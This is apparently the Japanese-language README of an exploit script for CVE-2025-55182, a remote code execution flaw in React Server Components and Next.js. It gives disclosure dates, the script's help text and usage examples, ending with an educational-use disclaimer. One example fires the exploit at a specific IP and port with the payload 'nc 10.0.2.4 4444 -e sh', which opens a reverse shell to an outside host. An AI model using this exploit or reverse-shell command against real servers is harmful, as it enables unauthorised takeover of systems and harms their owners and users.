
CVE-2025-55182 エクスプロイト | 作者: infrar3d
作者: infrar3d
React.jsのサーバーサイド使用に影響する重大度10.0の深刻な脆弱性で、React.jsではCVE-2025-55182、Next.jsフレームワークではCVE-2025-66478として追跡されています。
この脆弱性は、2025年11月29日PTにLachlan Davidson氏によってMetaチームに責任を持って開示されました。最初の開示とパッチリリースは、2025年12月3日PTにReactおよびVercelによって行われました。(原文:https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
本ソフトウェアおよび概念実証コードは、教育および研究目的のみに提供されています。
あなたはすべての適用法規を遵守する責任があります。倫理的かつ責任を持って使用してください。